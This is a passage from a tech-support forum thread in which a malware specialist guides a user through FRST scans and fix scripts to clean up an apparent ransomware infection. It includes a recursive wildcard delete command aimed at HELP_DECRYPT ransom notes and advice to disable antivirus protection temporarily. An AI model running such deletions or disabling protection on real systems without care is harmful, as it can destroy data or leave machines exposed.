    Error: (03/28/2015 06:58:14 PM) (Source: .NET Runtime 2.0 Error Reporting) (EventID: 5000) (User: )
    Description: EventType clr20r3, P1 kies.exe, P2 1.0.0.893, P3 5073d4b9, P4 kies, P5 1.0.0.893, P6 5073d4b9, P7 2d, P8 0, P9 clr20r30, P10 clr20r31.

    Error: (03/28/2015 06:54:49 PM) (Source: MemeoBackgroundService) (EventID: 0) (User: )
    Description: Problem starting Memeo Background Service :.Config file 'C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe.config' cannot be read successfully due to exception 'System.IO.FileNotFoundException: The system cannot find the file specified. (Exception from HRESULT: 0x80070002)
    at System.ConfigServer.RunParser(IConfigHandler factory, String fileName)
    at System.ConfigTreeParser.Parse(String fileName, String configPath, Boolean skipSecurityStuff)
    at System.Runtime.Remoting.Activation.RemotingXmlConfigFileParser.ParseConfigFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)'. at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.DoConfiguration(String filename, Boolean ensureSecurity)
    at System.Runtime.Remoting.RemotingConfiguration.Configure(String filename, Boolean ensureSecurity)
    at RemoteServerService.MemeoBackgroundService.OnStart(String[] args)

    Error: (03/28/2015 06:52:18 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application plugin-container.exe, version 36.0.4.5557, faulting module mozalloc.dll, version 36.0.4.5557, fault address 0x00001e02.
    Processing media-specific event for [plugin-container.exe!ws!]

    Error: (03/28/2015 04:50:37 PM) (Source: .NET Runtime 2.0 Error Reporting) (EventID: 5000) (User: )
    Description: EventType clr20r3, P1 kies.exe, P2 1.0.0.893, P3 5073d4b9, P4 kies, P5 1.0.0.893, P6 5073d4b9, P7 2d, P8 0, P9 clr20r30, P10 clr20r31.

    Error: (03/28/2015 04:45:30 PM) (Source: MemeoBackgroundService) (EventID: 0) (User: )
    Description: Problem starting Memeo Background Service :.Config file 'C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe.config' cannot be read successfully due to exception 'System.IO.FileNotFoundException: The system cannot find the file specified. (Exception from HRESULT: 0x80070002)
    at System.ConfigServer.RunParser(IConfigHandler factory, String fileName)
    at System.ConfigTreeParser.Parse(String fileName, String configPath, Boolean skipSecurityStuff)
    at System.Runtime.Remoting.Activation.RemotingXmlConfigFileParser.ParseConfigFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)'. at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.DoConfiguration(String filename, Boolean ensureSecurity)
    at System.Runtime.Remoting.RemotingConfiguration.Configure(String filename, Boolean ensureSecurity)
    at RemoteServerService.MemeoBackgroundService.OnStart(String[] args)


    System errors:
    =============
    Error: (03/28/2015 07:34:22 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:32:21 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:30:10 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:28:00 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:25:59 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:22:32 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
    Description: The McAfee Boot Delay Start Service service hung on starting.

    Error: (03/28/2015 07:13:14 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

    Error: (03/28/2015 07:11:36 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
    Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the McAfee Platform Services service, but this action failed with the following error:
    %%1056

    Error: (03/28/2015 07:11:36 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
    Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the McAfee VirusScan Announcer service, but this action failed with the following error:
    %%1056

    Error: (03/28/2015 07:11:03 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
    Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.


    Microsoft Office Sessions:
    =========================
    Error: (11/09/2010 10:52:49 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
    Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 5988 seconds with 360 seconds of active time. This session ended with a crash.


    ==================== Memory info ===========================

    Processor: Intel(R) Pentium(R) 4 CPU 3.00GHz
    Percentage of memory in use: 56%
    Total physical RAM: 2559 MB
    Available physical RAM: 1119.44 MB
    Total Pagefile: 4451.45 MB
    Available Pagefile: 2321.59 MB
    Total Virtual: 2047.88 MB
    Available Virtual: 1893.02 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:931.5 GB) (Free:574.57 GB) NTFS ==>[Drive with boot components (Windows XP)]
    Drive d: (New Volume) (Fixed) (Total:111.72 GB) (Free:111.64 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 88977EAF)
    Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 1 (MBR Code: Windows XP) (Size: 111.8 GB) (Disk ID: 9DC96E9E)
    Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
    Partition 2: (Not Active) - (Size=111.7 GB) - (Type=07 NTFS)

    ==================== End Of Log ============================
     
  11. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    Attached are the results of the shortcut.txt. File was too long to be able to display.
     

    Attached Files:

  12. JSntgRvr

    JSntgRvr Retired Moderator and Malware Specialist

    Joined:
    Jul 1, 2003
    Messages:
    18,552
    First Name:
    José
    Please download the enclose file. (See below) and save it in the same location FRST is saved.
    • Start FRST with Administrator privileges.
    • Press the Fix button.
    • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
      Please copy and paste its contents in your next reply.
     

    Attached Files:

  13. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    Attached are the results of the fixlog.txt....could not post due to file being too big !!!
     

    Attached Files:

  14. JSntgRvr

    JSntgRvr Retired Moderator and Malware Specialist

    Joined:
    Jul 1, 2003
    Messages:
    18,552
    First Name:
    José
    Please download the enclose file. (See below) and save it in the same location FRST is saved.
    • Temporarily turn McAfee real time protection
    • Start FRST with Administrator privileges.
    • Press the Fix button.
    • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
      Please copy and paste its contents in your next reply.
     

    Attached Files:

  15. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    THESE ARE THE RESULTS OF THE FIXLOG.TXT....KEEP IN MIND THAT REAL TIME SCANNING WAS DIABLED.


    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 11-03-2015
    Ran by RAUL_104 at 2015-03-29 15:48:14 Run:2
    Running from C:\Documents and Settings\RAUL_104\My Documents\Downloads
    Loaded Profiles: RAUL_104 (Available profiles: RAUL_104 & RAUL_106 & AMY_106 & AMY_1061 & Administrator & Guest)
    Boot Mode: Normal

    ==============================================

    Content of fixlist:
    *****************
    Start
    CloseProcesses:
    C:\WINDOWS\System32\atolpphm.exe
    C:\Documents and Settings\RAUL_104\atolpphm.exe
    C:\Documents and Settings\RAUL_104\Application Data\msitsxr.exe
    CMD: Del /q /s C:\HELP_DECRYPT.*
    End
    *****************

    Processes closed successfully.
    "C:\WINDOWS\System32\atolpphm.exe" => File/Directory not found.
    "C:\Documents and Settings\RAUL_104\atolpphm.exe" => File/Directory not found.
    "C:\Documents and Settings\RAUL_104\Application Data\msitsxr.exe" => File/Directory not found.

    ========= Del /q /s C:\HELP_DECRYPT.* =========

    C:\Documents and Settings\All Users\Application Data\McAfee\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\dspwrp\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\dspwrp\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HackerWatch\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HackerWatch\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HackerWatch\data\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\HackerWatch\data\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\MSC\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\MSC\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\SACore\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\SACore\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\sasshmod.dll\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\sasshmod.dll\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\saUpd.exe\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\saUpd.exe\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\saupkeep.dll\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\SiteAdvisor\saupkeep.dll\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\Quarantine\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\Quarantine\HELP_DECRYPT.URL
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\Quarantine\quarantine\HELP_DECRYPT.PNG
    Access is denied.
    C:\Documents and Settings\All Users\Application Data\McAfee\VirusScan\Quarantine\quarantine\HELP_DECRYPT.URL
    Access is denied.

    ========= End of CMD: =========



    The system needed a reboot.

    ==== End of Fixlog 16:05:46 ====
     
  16. Sponsor

As Seen On
As Seen On...

Welcome to Tech Support Guy!

Are you looking for the solution to your computer problem? Join our site today to ask your question. This site is completely free -- paid for by advertisers and donations.

If you're not already familiar with forums, watch our Welcome Guide to get started.

Join over 733,556 other people just like you!

Loading...
Thread Status:
Not open for further replies.

Short URL to this thread: https://techguy.org/1145587

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice